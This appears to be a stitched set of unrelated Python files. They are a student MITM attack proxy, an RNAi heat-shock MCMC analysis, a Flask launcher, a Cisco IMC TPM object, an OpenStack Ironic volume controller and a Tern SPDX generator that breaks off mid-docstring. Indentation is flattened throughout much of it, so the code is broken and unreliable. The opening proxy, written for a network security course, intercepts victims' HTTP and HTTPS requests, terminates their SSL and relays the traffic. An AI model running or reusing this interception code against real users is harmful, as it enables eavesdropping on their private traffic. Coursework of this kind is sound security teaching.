        # return the socket or wrapped socket
# ======== Your Code Here!! =======================
sock = socket()
if self.sslenable == True:
sock = ssl.wrap_socket(sock)
addr = Socket.gethostbyname(host)
print 'connect to server [{} {} {}] from client [{}]'.format(host, addr, port, self.socket.getpeername()[1])
sock.connect((addr, port))
return sock
def ReadLine(self,SourceSock):
        # This function reads a single line (terminated by \r\n) from the socket
line = ""
while True:
char = SourceSock.recv(1)
line += char
if not line.find("\r\n") == -1 :
return line
def ReadNum(self,SourceSock,length):
        # read exactly `length` bytes of data from SourceSock
line = ""
while len(line) < length:
char = SourceSock.recv(1)
line += char
return line
def ReadHeader(self,SourceSock):
        # This function reads the HTTP header from the socket
header = ""
line = SourceSock.recv(1)
data = line
while len(line) :
line = SourceSock.recv(1)
data += line
if not data.find("\r\n\r\n")==-1 :
header = data
data = ""
break;
dicHeader = dict(re.findall(r"(?P<name>.*?): (?P<value>.*?)\r\n", header))
#print dicHeader
#for (k,v) in dicHeader.items():
# print k,":",v
return dicHeader, header
def ReadHttp(self,SourceSock):
# Read whole Http packet, and return header and body in string type
#dicHeader, header = self.ReadHeader(SourceSock)
res = self.ReadHeader(SourceSock)
if not res:
return
dicHeader = res[0]
header = res[1]
body = ""
if 'Transfer-Encoding' in dicHeader and dicHeader['Transfer-Encoding'] == 'chunked' :
line = self.ReadLine(SourceSock)
body += line
chunkSize = int(line,16)
print "chunk size is {}".format(chunkSize)
#while True :
if chunkSize != 0 :
line = self.ReadNum(SourceSock,chunkSize+2)
body += line
else :
if 'Content-Length' in dicHeader :
length = int(dicHeader['Content-Length'])
else :
length = 0
while length>0 :
line = SourceSock.recv(1)
length -= len(line)
body += line
#self.PrinfContent(body)
return header,body
def PrintContent(self,content):
index = 0
part = 0x10
print '[PrintContent]'
while index < len(content) :
length = part if len(content)-index >= part else len(content)-index
print "%08d" % index ,
for i in range(index,index+length):
                print content[i].encode('hex').upper(),
print_str=""
for i in range(index,index+length):
if content[i] not in string.printable or content[i] in {'\n','\r','\t'}:
print_str+='.'
else:
print_str+=content[i]
print print_str
index+=length
def getHostFromHeader(self, header):
# Parsing first http packet and find
        # 1) whether ssl is enabled: if the header contains "CONNECT 192.168.6.131:443 HTTP/1.1"
        #    then it is an https connection, and the port and host are returned
        # 2) the port to connect to
        # 3) the host to connect to
if 'CONNECT' in header:
self.sslenable = True
#print "The header is: "+header
tokens = str(header).split('\r\n')
tokens = tokens[1].split(' ')
host = tokens[1]
if self.sslenable == True:
port = 443
else:
port = 80
return host,port
def simpleRead(self, socket):
return socket.recv(8192)
def run(self):
# The main function for MITM
# You need to do
# 1. read http request sent from victim, and use getHostFromHeader to reveal host and port of target website
# 2. if ssl is enabled, you should use initSSLConnection() to create ssl wrap socket
# 2.1 if ssl is enabled, you should receive the real request from client by ReadHTTP()
# 3. create a fakeSocket and connect to website which victim want to connect
# ==============Your Code Here !! ====================================
request = self.ReadHttp(self.socket)
host,port = self.getHostFromHeader(request[0])
if ("icloud" in host) or ("dropbox" in host) or ("apple" in host):
return
# if ("wiki" not in host) and ("neverssl" not in host):
# print 'return'
# return
#if "facebook" not in host:
# return
if self.sslenable == True:
#try:
self.socket = self.initSSLConnection(self.socket)
request = self.ReadHttp(self.socket)
#host,port = self.getHostFromHeader(request[0])
#except Exception as ex:
# print host
# print ex
print request[0]
#if host.rstrip() != "140.113.207.95":
#print "return!!!!!!!!!!!!!"
#return
rsock = self.CreateSocketAndConnectToOriginDst(host, int(port))
# 4. Forward the request sent by user to the fakeSocket
rsock.sendall(request[0]+request[1])
print "Client [{}] Request Forwarding Success".format(self.client_port)
# 5. Read response from fakeSocket and forward to victim's socket
# 6. close victim's socket and fakeSocket
response = self.ReadHttp(rsock)
print "Server [{}] responded to client [{}]".format(host, self.client_port)
#print "server msg: " + response[0]
#self.PrintContent(response[1])
self.socket.sendall(response[0]+response[1])
print "Server sent"
inputs = [ rsock, self.socket ]
outputs = []
while True:
readable, writable, exceptional = select.select(inputs, outputs, inputs)
for s in readable:
if s is rsock:
raddr = rsock.getsockname()
#print '{0} {1} read server'.format(host, raddr[1])
#rsock.setblocking(True)
#res = self.ReadHttp(s)
res = self.simpleRead(s)
if res:
#self.PrintContent(res)
self.socket.sendall(res)
else:
                        print 'server [{} {}] closed the connection to client [{}]'.format(host, raddr[1], self.client_port)
self.socket.close()
rsock.close()
return
else:
raddr = s.getpeername()
#print '{0} {1} read client'.format(host, raddr[1])
#self.socket.setblocking(True)
#res = self.ReadHttp(self.socket)
res = self.simpleRead(s)
if res:
#rsock.send(res[0] + res[1])
#self.PrintContent(res)
rsock.sendall(res)
else:
print 'server [{} {}] was closed by client [{}]'.format(host, raddr[1], self.client_port)
self.socket.close()
rsock.close()
return
# self.socket.close()
# rsock.close()
print "Connection Finished"
if not len(sys.argv) == 3 :
    print "This program is a template for a proxy-level MITM attack"
    print "This program is part of the Network Security Project"
    print "Usage: python mitm.py <your address> <port>"
    sys.exit(1)
ip = sys.argv[1]
port = int(sys.argv[2])
bindAddress = (ip , port)
serverSocket = socket(AF_INET,SOCK_STREAM)
serverSocket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
serverSocket.bind(bindAddress)
serverSocket.listen(1)
threads = []
data_dir = "/home/netsec/MITM-master/"
while True :
clientSocket,addr = serverSocket.accept()
handler(clientSocket, port).start()
|
class AutoPrep:
def __init__(self, docs):
self.docs = self._format(docs)
self.docs = self._clean()
    def _format(self, docs):
        # normalize the input into a flat list of document strings
        # input is a single string
        if isinstance(docs, str):
            return [docs]
        # input is list with strings
        if isinstance(docs[0], str):
            return list(docs)
        # input is list with lists
        if isinstance(docs[0], list):
            return [' '.join(doc) for doc in docs]
        return docs
def _clean(self):
from signs import Clean
return [[Clean(doc).text] for doc in self.docs]
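# Usage sketch (assumes the external `signs` package providing Clean is installed):
# prep = AutoPrep(["First document text.", "Second document text."])
# prep.docs  # -> a list of single-element lists holding the cleaned text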
|
import collections
import warnings
# Our numerical workhorses
import numpy as np
import pandas as pd
import scipy.optimize
import scipy.stats as st
# Numba to make things faster
import numba
# The MCMC Hammer
import emcee
# Numerical differentiation package
import numdifftools as ndt
# Import plotting tools
import matplotlib.pyplot as plt
import seaborn as sns
import corner
# JB's favorite Seaborn settings for notebooks
rc = {'lines.linewidth': 2,
'axes.labelsize': 18,
'axes.titlesize': 18,
'axes.facecolor': 'DFDFE5'}
sns.set_context('notebook', rc=rc)
sns.set_style('darkgrid', rc=rc)
# Suppress future warnings
warnings.simplefilter(action='ignore', category=FutureWarning)
input_path = '../input/rnai_screen_results/'
output_path = '../output/rnai_screen_results/'
df = pd.read_csv(input_path + 'rnai_heat_shock_data.txt', sep='\t')
names = pd.read_csv(input_path + 'rnai_genes_dict.csv')
names.head()
# rename the columns to something handy
df.columns = ['rnai', 'alive', 'dead', 'date']
# make all codes upper or lower, not both
# first make sure each column is a str
names.code = names.code.apply(str)
df.rnai = df.rnai.apply(str)
# now apply lower
names.code = names.code.apply(str.lower)
df.rnai = df.rnai.apply(str.lower)
# extract the names that have been assayed so far
def translate(x):
"""a function to go between rnai code and gene (human-readable) name."""
return names[names.code == x].gene_name.values[0]
df['gene'] = df.rnai.apply(translate)
df.sort_values('gene', inplace=True)
# calculate fraction dead
df['fraction_dead'] = df.dead/(df.alive + df.dead)
# standardize dead values to the mean and stdev of the gfp data
gfp_fr_dead_mu = df.fraction_dead.mean()
gfp_fr_dead_sig = df.fraction_dead.std()
total = (df.dead+df.alive)
df['z_dead'] = (df.dead - total*gfp_fr_dead_mu)/(gfp_fr_dead_sig*total)
# plot in either a swarmplot or boxplot
plot = sns.swarmplot(x='gene', y='fraction_dead', data=df)
plt.xticks(rotation=30)
plt.title('Heat Survival After 24 hours')
plt.savefig(output_path + 'swarmplot_gene_heat_shock_assays.pdf')
plot = sns.swarmplot(x='gene', y='z_dead', data=df)
plt.xticks(rotation=30)
plt.title('Heat Survival After 24 hours')
plt.show()
plot = sns.boxplot(x='gene', y='z_dead', data=df)
plt.xticks(rotation=30)
plt.title('Heat Survival After 24 hours')
plt.ylim(-3, 3)
plt.show()
sns.boxplot(x='gene', y='fraction_dead', data=df)
plt.xticks(rotation=30)
plt.title('Heat Survival After 24 hours')
plt.savefig(output_path + 'boxplot_gene_heat_shock_assays.pdf')
plt.show()
sns.boxplot(x='date', y='fraction_dead', data=df[df.gene == 'gfp'])
plt.xticks(rotation=30)
plt.title('Day-to-Day Variation in Heat Survival After 24 hours')
plt.savefig(output_path + 'boxplot_gene_heat_shock_controls_by_date.pdf')
plt.show()
# first, identify outliers in the data
# in theory, the counts should be binomially distributed; since the counts
# are standardized above (z_dead), we are using a normal approximation
def log_posterior_good_bad(p, x):
"""The log posterior for good/bad data model for repeated measurements."""
# Pull out parameters
mu, sigma, sigma_bad = p[:3]
    # accept both numpy parameter vectors (from emcee) and plain python lists
    g = np.asarray(p[3:], dtype=float).ravel()
    mu, sigma, sigma_bad = float(mu), float(sigma), float(sigma_bad)
# Check to make sure the prior conditions are ok
# if any(i < 0.0 for i in g):
# return -np.inf
# if any(i > 1.0 for i in g):
# return -np.inf
#
# if sigma >= 0:
# return -np.inf
# if sigma_bad < sigma:
# return -np.inf
# log prior
log_prior = -np.log(sigma) - np.log(sigma_bad)
# Add in likelihood
log_like_good = np.log(g / sigma) - ((x - mu) / sigma)**2 / 2.0
log_like_bad = np.log((1.0 - g) / sigma_bad) \
- ((x - mu) / sigma_bad)**2 / 2.0
log_like = np.logaddexp(log_like_good, log_like_bad).sum()
# Return the whole posterior
return log_prior + log_like
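# The function above implements a per-point mixture model: each measurement x_i is
# drawn from a "good" normal N(mu, sigma) with weight g_i or a "bad" (wider) normal
# N(mu, sigma_bad) with weight (1 - g_i),
#     p(x_i | mu, sigma, sigma_bad, g_i) = g_i N(x_i; mu, sigma) + (1 - g_i) N(x_i; mu, sigma_bad),
# with Jeffreys priors 1/sigma and 1/sigma_bad on the scale parameters.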
# Set up MCMC parameters
n_dim = 3 + len(df[df.gene == 'gfp']) # number of parameters in the model
n_walkers = 200 # number of MCMC walkers
n_burn = 2000 # "burn-in" period to let chains stabilize
n_steps = 5000 # number of MCMC steps to take after burn-in
# Seed random number generator for reproducibility
np.random.seed(42)
# Generate random starting points for walkers.
# p0[i,j] is the starting point for walk i along variable j.
p0 = np.empty((n_walkers, n_dim))
p0[:, 0] = np.random.uniform(10, 30, n_walkers) # mu
p0[:, 1] = np.random.exponential(5.0, n_walkers) # sigma
p0[:, 2] = np.random.exponential(20.0, n_walkers) # sigma_bad
p0[:, 3:] = np.random.uniform(0.0, 1.0, (n_walkers, n_dim-3)) # g_i
# Set up the EnsembleSampler instance
sampler = emcee.EnsembleSampler(n_walkers, n_dim, log_posterior_good_bad,
args=(df[df.gene == 'gfp'].z_dead,),
threads=6)
# Do the burn-in
pos, prob, state = sampler.run_mcmc(p0, n_burn, storechain=False)
# Reset sampler and run from the burn-in state we got to
_ = sampler.run_mcmc(pos, n_steps)
# Get most probable parameter value
max_ind = np.argmax(sampler.flatlnprobability)
mean_goodbad = sampler.flatchain[max_ind, 0]
sigma = sampler.flatchain[max_ind, 1]
# Get the error bar
sem_goodbad = sampler.flatchain[:, 0].std()
# Report results
print("""
Good/bad data model: {0:.2f} ± {1:.2f} (z-score units)
""".format(mean_goodbad, sem_goodbad))
sns.stripplot(y='z_dead', data=df[df.gene == 'gfp'], jitter=True)
plt.plot(plt.gca().get_xlim(), [mean_goodbad, mean_goodbad], '-',
color=sns.color_palette()[1], label='Good/bad')
plt.ylabel('standardized dead fraction (z-score)')
plt.legend()
plt.show()
# Compute mean goodness of data
g = sampler.flatchain[:, 3:].mean(axis=0)
# Identify outliers
outliers = (g < g.mean() - 1.7*g.std())
# Make strip plot with outliers in red
sns.stripplot(y='z_dead', data=df[df.gene == 'gfp'][~outliers],
jitter=True)
sns.stripplot(y='z_dead', data=df[df.gene == 'gfp'][outliers],
jitter=True, color=sns.color_palette()[2])
plt.ylabel('standardized dead fraction (z-score)')
plt.show()
sigma
np.sqrt(sigma)
corner.corner(sampler.flatchain[:, :3],
labels=[r'$\mu$', r'$\sigma$', r'$\sigma_\mathrm{bad}$'],
bins=100)
plt.show()
# get the number of groups
n_genes_tested = df.gene.unique().shape[0]
# number of tests per group
n = np.array([len(df[df.gene == g]) for g in df.gene.unique()])
# get the start/end indices of each group
n = n.astype(int)
inds = np.concatenate(((0,), n.cumsum()))
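# e.g. if n = [3, 2] then inds = [0, 3, 5], so the measurements belonging to
# group i are z_dead_vals[inds[i]:inds[i+1]]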
z_dead_vals = df.z_dead.values
df.shape
len(inds)
def log_post_hierarchical(params, data, inds, total=df.shape[0]):
if len(data) < 2:
raise ValueError('Too few datapoints to run simulation')
L = len(inds)-1
mu = params[0: L]
sigma = params[L: 2*L]
sigma_bad = params[2*L: 3*L]
G = params[3*L: 4*L]
g = params[4*L:4*L + total]
M = params[-3]
S = params[-2]
S_bad = params[-1]
# cropping
if any(i <= 0 for i in sigma):
return -np.inf
if any(i <= 0 for i in sigma_bad):
return -np.inf
if (sigma_bad < sigma).any():
return -np.inf
if S <= 0:
return -np.inf
if (S_bad <= 0):
return -np.inf
if (S_bad < S):
return - np.inf
if any(i < 0 for i in g):
return -np.inf
if any(i < 0 for i in G):
return -np.inf
if any(i > 1 for i in g):
return -np.inf
if any(i > 1 for i in G):
return -np.inf
# log likelihood calculation
lp = 0
for i, m in enumerate(mu):
# extract data
# fit each parameter
# data for log_posterior_good_bad
        x = data[inds[i]: inds[i+1]]
gs = g[inds[i]: inds[i+1]]
p = [m, sigma[i], sigma_bad[i], gs]
P = [M, S, S_bad, G[i]]
# print(p[0:3])
        # print(P[0:3])
        # print(type(m))
        # print(type(M))
lp += log_posterior_good_bad(p, x) # outlier detection for bad data
lp += log_posterior_good_bad(P, m) # outlier detection, effects!
return lp
def mcmc(data, inds, n_burn=5000, n_steps=5000, a=2, total=df.shape[0]):
"""
A parser that sets up and executes an emcee-based MCMC for a
hierarchical binomial beta distribution.
Takes in two lists of data (natt, nc) and returns an
EnsembleSampler object.
"""
n_dim = 4*len(inds) - 4 + total + 3 # no. of dimensions
n_walkers = n_dim*50 # number of MCMC walkers
    # p0[i,j] is the starting point for walker i along variable j.
    p0 = np.empty((n_walkers, n_dim))
L = len(inds) - 1
    for i in range(0, L):
p0[:, i] = np.random.uniform(-5, 5, n_walkers) # mu
p0[:, i + L] = np.random.exponential(5.0, n_walkers) # sigma
p0[:, i + 2*L] = np.random.exponential(5.0, n_walkers) # sigma_bad
p0[:, i + 3*L] = np.random.uniform(0.0, 1.0, n_walkers) # G_i
for i in range(0, total):
p0[:, i + 4*L] = np.random.uniform(0.0, 1.0, n_walkers) # g_i
p0[:, -3] = np.random.uniform(-5, 5, n_walkers) # M
p0[:, -2] = np.random.exponential(5.0, n_walkers) # S
p0[:, -1] = np.random.exponential(5.0, n_walkers) # S_bad
# set up the sampler
sampler = emcee.EnsembleSampler(n_walkers, n_dim, log_post_hierarchical,
args=(data, inds,), threads=6, a=a)
# Do burn-in
pos, prob, state = sampler.run_mcmc(p0, n_burn, storechain=False)
# Sample again, starting from end burn-in state
_ = sampler.run_mcmc(pos, n_steps)
return sampler
sampler = mcmc(z_dead_vals, inds, n_burn=5000, n_steps=5000, a=2,
total=df.shape[0])
|
from web_temp import web
from server.proxy import server_proxy
import os
import sys
from multiprocessing import Process,Lock
import time
def work1():
# lock.acquire()
time.sleep(1)
print(1111)
web.app.run(host='0.0.0.0',port=5000,debug=False)
# lock.release()
def work2():
time.sleep(2)
print(2222)
# lock.acquire()
server_proxy.app.run(host='0.0.0.0',port=8081,debug=False)
# lock.release()
if __name__ == '__main__':
os.chdir(sys.path[0])
lock=Lock()
p1 = Process(target=work1)
p1.start()
p2 = Process(target=work2)
p2.start()
# if __name__ == '__main__':
# os.chdir(sys.path[0])
# # web.app.run(port=5000,debug=False)
# lock = Lock()
# p2 = Process(target=work2, args=(lock,))
# p2.start()
# # server_proxy.app.run(port=8081,debug=False) |
"""This module contains the general information for EquipmentTpm ManagedObject."""
from ...imcmo import ManagedObject
from ...imccoremeta import MoPropertyMeta, MoMeta
from ...imcmeta import VersionMeta
class EquipmentTpmConsts:
ACTIVE_STATUS_NA = "NA"
ACTIVE_STATUS_ACTIVATED = "activated"
ACTIVE_STATUS_DEACTIVATED = "deactivated"
ACTIVE_STATUS_UNKNOWN = "unknown"
ENABLED_STATUS_NA = "NA"
ENABLED_STATUS_DISABLED = "disabled"
ENABLED_STATUS_ENABLED = "enabled"
ENABLED_STATUS_UNKNOWN = "unknown"
OWNERSHIP_NA = "NA"
OWNERSHIP_OWNED = "owned"
OWNERSHIP_UNKNOWN = "unknown"
OWNERSHIP_UNOWNED = "unowned"
PRESENCE_NA = "NA"
PRESENCE_EMPTY = "empty"
PRESENCE_EQUIPPED = "equipped"
PRESENCE_EQUIPPED_IDENTITY_UNESTABLISHABLE = "equipped-identity-unestablishable"
PRESENCE_EQUIPPED_NOT_PRIMARY = "equipped-not-primary"
PRESENCE_EQUIPPED_WITH_MALFORMED_FRU = "equipped-with-malformed-fru"
PRESENCE_INACCESSIBLE = "inaccessible"
PRESENCE_MISMATCH = "mismatch"
PRESENCE_MISMATCH_IDENTITY_UNESTABLISHABLE = "mismatch-identity-unestablishable"
PRESENCE_MISSING = "missing"
PRESENCE_NOT_SUPPORTED = "not-supported"
PRESENCE_UNAUTHORIZED = "unauthorized"
PRESENCE_UNKNOWN = "unknown"
class EquipmentTpm(ManagedObject):
"""This is EquipmentTpm class."""
consts = EquipmentTpmConsts()
naming_props = set([])
mo_meta = {
"classic": MoMeta("EquipmentTpm", "equipmentTpm", "tpm", VersionMeta.Version201a, "OutputOnly", 0xf, [], ["read-only"], ['computeBoard'], [], ["Get"]),
"modular": MoMeta("EquipmentTpm", "equipmentTpm", "tpm", VersionMeta.Version2013e, "OutputOnly", 0xf, [], ["read-only"], ['computeBoard'], [], ["Get"])
}
prop_meta = {
"classic": {
"active_status": MoPropertyMeta("active_status", "activeStatus", "string", VersionMeta.Version201a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["NA", "activated", "deactivated", "unknown"], []),
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version201a, MoPropertyMeta.INTERNAL, None, None, None, None, [], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version201a, MoPropertyMeta.READ_ONLY, 0x2, 0, 255, None, [], []),
"enabled_status": MoPropertyMeta("enabled_status", "enabledStatus", "string", VersionMeta.Version201a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["NA", "disabled", "enabled", "unknown"], []),
"model": MoPropertyMeta("model", "model", "string", VersionMeta.Version201a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"ownership": MoPropertyMeta("ownership", "ownership", "string", VersionMeta.Version201a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["NA", "owned", "unknown", "unowned"], []),
"presence": MoPropertyMeta("presence", "presence", "string", VersionMeta.Version201a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["NA", "empty", "equipped", "equipped-identity-unestablishable", "equipped-not-primary", "equipped-with-malformed-fru", "inaccessible", "mismatch", "mismatch-identity-unestablishable", "missing", "not-supported", "unauthorized", "unknown"], []),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version201a, MoPropertyMeta.READ_ONLY, 0x4, 0, 255, None, [], []),
"serial": MoPropertyMeta("serial", "serial", "string", VersionMeta.Version201a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version201a, MoPropertyMeta.READ_ONLY, 0x8, None, None, r"""((removed|created|modified|deleted),){0,3}(removed|created|modified|deleted){0,1}""", [], []),
"tpm_revision": MoPropertyMeta("tpm_revision", "tpmRevision", "string", VersionMeta.Version201a, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
"vendor": MoPropertyMeta("vendor", "vendor", "string", VersionMeta.Version201a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"version": MoPropertyMeta("version", "version", "string", VersionMeta.Version201a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
},
"modular": {
"active_status": MoPropertyMeta("active_status", "activeStatus", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_ONLY, None, None, None, None, ["NA", "activated", "deactivated", "unknown"], []),
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version2013e, MoPropertyMeta.INTERNAL, None, None, None, None, [], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_ONLY, 0x2, 0, 255, None, [], []),
"enabled_status": MoPropertyMeta("enabled_status", "enabledStatus", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_ONLY, None, None, None, None, ["NA", "disabled", "enabled", "unknown"], []),
"model": MoPropertyMeta("model", "model", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"ownership": MoPropertyMeta("ownership", "ownership", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_ONLY, None, None, None, None, ["NA", "owned", "unknown", "unowned"], []),
"presence": MoPropertyMeta("presence", "presence", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_ONLY, None, None, None, None, ["NA", "empty", "equipped", "equipped-identity-unestablishable", "equipped-not-primary", "equipped-with-malformed-fru", "inaccessible", "mismatch", "mismatch-identity-unestablishable", "missing", "not-supported", "unauthorized", "unknown"], []),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_ONLY, 0x4, 0, 255, None, [], []),
"serial": MoPropertyMeta("serial", "serial", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_ONLY, 0x8, None, None, r"""((removed|created|modified|deleted),){0,3}(removed|created|modified|deleted){0,1}""", [], []),
"tpm_revision": MoPropertyMeta("tpm_revision", "tpmRevision", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
"vendor": MoPropertyMeta("vendor", "vendor", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"version": MoPropertyMeta("version", "version", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
},
}
prop_map = {
"classic": {
"activeStatus": "active_status",
"childAction": "child_action",
"dn": "dn",
"enabledStatus": "enabled_status",
"model": "model",
"ownership": "ownership",
"presence": "presence",
"rn": "rn",
"serial": "serial",
"status": "status",
"tpmRevision": "tpm_revision",
"vendor": "vendor",
"version": "version",
},
"modular": {
"activeStatus": "active_status",
"childAction": "child_action",
"dn": "dn",
"enabledStatus": "enabled_status",
"model": "model",
"ownership": "ownership",
"presence": "presence",
"rn": "rn",
"serial": "serial",
"status": "status",
"tpmRevision": "tpm_revision",
"vendor": "vendor",
"version": "version",
},
}
def __init__(self, parent_mo_or_dn, **kwargs):
self._dirty_mask = 0
self.active_status = None
self.child_action = None
self.enabled_status = None
self.model = None
self.ownership = None
self.presence = None
self.serial = None
self.status = None
self.tpm_revision = None
self.vendor = None
self.version = None
ManagedObject.__init__(self, "EquipmentTpm", parent_mo_or_dn, **kwargs)
|
# Copyright (c) 2017 Hitachi, Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from http import client as http_client
import pecan
from pecan import rest
from ironic import api
from ironic.api.controllers import base
from ironic.api.controllers import link
from ironic.api.controllers.v1 import utils as api_utils
from ironic.api.controllers.v1 import volume_connector
from ironic.api.controllers.v1 import volume_target
from ironic.api import expose
from ironic.common import exception
from ironic.common import policy
class Volume(base.APIBase):
"""API representation of a volume root.
This class exists as a root class for the volume connectors and volume
targets controllers.
"""
links = None
"""A list containing a self link and associated volume links"""
connectors = None
"""Links to the volume connectors resource"""
targets = None
"""Links to the volume targets resource"""
@staticmethod
def convert(node_ident=None):
url = api.request.public_url
volume = Volume()
if node_ident:
resource = 'nodes'
args = '%s/volume/' % node_ident
else:
resource = 'volume'
args = ''
volume.links = [
link.make_link('self', url, resource, args),
link.make_link('bookmark', url, resource, args,
bookmark=True)]
volume.connectors = [
link.make_link('self', url, resource, args + 'connectors'),
link.make_link('bookmark', url, resource, args + 'connectors',
bookmark=True)]
volume.targets = [
link.make_link('self', url, resource, args + 'targets'),
link.make_link('bookmark', url, resource, args + 'targets',
bookmark=True)]
return volume
class VolumeController(rest.RestController):
"""REST controller for volume root"""
_subcontroller_map = {
'connectors': volume_connector.VolumeConnectorsController,
'targets': volume_target.VolumeTargetsController
}
def __init__(self, node_ident=None):
super(VolumeController, self).__init__()
self.parent_node_ident = node_ident
@expose.expose(Volume)
def get(self):
if not api_utils.allow_volume():
raise exception.NotFound()
cdict = api.request.context.to_policy_values()
policy.authorize('baremetal:volume:get', cdict, cdict)
return Volume.convert(self.parent_node_ident)
@pecan.expose()
def _lookup(self, subres, *remainder):
if not api_utils.allow_volume():
pecan.abort(http_client.NOT_FOUND)
subcontroller = self._subcontroller_map.get(subres)
if subcontroller:
return subcontroller(node_ident=self.parent_node_ident), remainder
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2021 VMware, Inc. All Rights Reserved.
# SPDX-License-Identifier: BSD-2-Clause
"""
SPDX JSON document generator
"""
import json
import logging
from tern.formats.spdx.spdx import SPDX
from tern.formats.spdx import spdx_common
from tern.utils.general import get_git_rev_or_version
from tern.utils import constants
from tern.formats.spdx.spdxjson import formats as json_formats
from tern.formats.spdx.spdxjson import image_helpers as mhelpers
from tern.formats.spdx.spdxjson import file_helpers as fhelpers
from tern.formats.spdx.spdxjson import layer_helpers as lhelpers
from tern.formats.spdx.spdxjson import package_helpers as phelpers
from tern.formats import generator
# global logger
logger = logging.getLogger(constants.logger_name)
def get_document_namespace(image_obj):
'''Given the image object, return a unique SPDX document uri.
This is a combination of the tool name and version, the image name
and the uuid'''
return json_formats.document_namespace.format(
version=get_git_rev_or_version()[1], image=image_obj.name,
uuid=spdx_common.get_uuid())
def get_document_namespace_snapshot(timestamp):
"""Get the document namespace for the container image snapshot. We pass
the timestamp so we have a common timestamp across the whole document"""
return json_formats.document_namespace_snapshot.format(
timestamp=timestamp, uuid=spdx_common.get_uuid())
def get_document_dict(image_obj, template):
'''Return document info as a dictionary'''
docu_dict = {
'SPDXID': json_formats.spdx_id,
'spdxVersion': json_formats.spdx_version,
'creationInfo': {
'created': json_formats.created.format(
timestamp=spdx_common.get_timestamp()),
'creators': json_formats.creator.format(
version=get_git_rev_or_version()[1]),
'licenseListVersion': json_formats.license_list_version,
},
'name': json_formats.document_name.format(image_name=image_obj.name),
'dataLicense': json_formats.data_license,
'comment': json_formats.document_comment,
'documentNamespace': get_document_namespace(image_obj),
'documentDescribes': [spdx_common.get_image_spdxref(image_obj)],
'packages': [
# image dict will be a single dictionary
# we'll add the layer and package dicts later if available
mhelpers.get_image_dict(image_obj, template)],
'relationships': lhelpers.get_image_layer_relationships(image_obj)
}
# Add list of layer dictionaries to packages list
docu_dict['packages'] += lhelpers.get_layers_list(image_obj)
# Add list of package dictionaries to packages list, if they exist
pkgs_dict_list = phelpers.get_packages_list(image_obj, template)
if pkgs_dict_list:
docu_dict['packages'] += pkgs_dict_list
# Add list of file dictionaries, if they exist
files = fhelpers.get_files_list(image_obj, template)
if files:
docu_dict['files'] = files
# Add package and file extracted license texts, if they exist
extracted_texts = mhelpers.get_image_extracted_licenses(image_obj)
if extracted_texts:
docu_dict['hasExtractedLicensingInfos'] = extracted_texts
return docu_dict
def get_document_dict_snapshot(layer_obj, template):
"""This is the SPDX document containing just the packages found at
container build time"""
timestamp = spdx_common.get_timestamp()
docu_dict = {
'SPDXID': json_formats.spdx_id,
'spdxVersion': json_formats.spdx_version,
'creationInfo': {
'created': json_formats.created.format(
timestamp=timestamp),
'creators': json_formats.creator.format(
version=get_git_rev_or_version()[1]),
'licenseListVersion': json_formats.license_list_version,
},
'name': json_formats.document_name_snapshot,
'dataLicense': json_formats.data_license,
'comment': json_formats.document_comment,
'documentNamespace': get_document_namespace_snapshot(timestamp),
# we will list all the unique package SPDXRefs here later
'documentDescribes': [],
# these will contain just the packages as there is no layer
# package at the time of this document's generation
'packages': [],
# we will fill in document to package ref relationships later
'relationships': []
}
# Add list of package dictionaries to packages list, if they exist
pkgs_dict_list, package_refs = phelpers.get_layer_packages_list(
layer_obj, template)
if pkgs_dict_list:
docu_dict['packages'] = pkgs_dict_list
docu_dict['documentDescribes'] = package_refs
# add the package relationships to the document
for ref in package_refs:
docu_dict['relationships'].append(json_formats.get_relationship_dict(
json_formats.spdx_id, ref, 'DESCRIBES'))
# Add list of file dictionaries, if they exist
files = fhelpers.get_layer_files_list(layer_obj, template, timestamp)
if files:
docu_dict['files'] = files
# Add package and file extracted license texts, if they exist
extracted_texts = lhelpers.get_layer_extracted_licenses(layer_obj)
if extracted_texts:
docu_dict['hasExtractedLicensingInfos'] = extracted_texts
return docu_dict
class SpdxJSON(generator.Generate):
def generate(self, image_obj_list, print_inclusive=False):
'''Generate an SPDX document
WARNING: This assumes that the list consists of one image or the base
image and a stub image, in which case, the information in the stub
image is not applicable in the SPDX case as it is an empty image
object with no metadata as nothing got built.
The whole document should be stored in a dictionary which can be
converted to JSON and dumped to a file using the write_report function
in report.py.
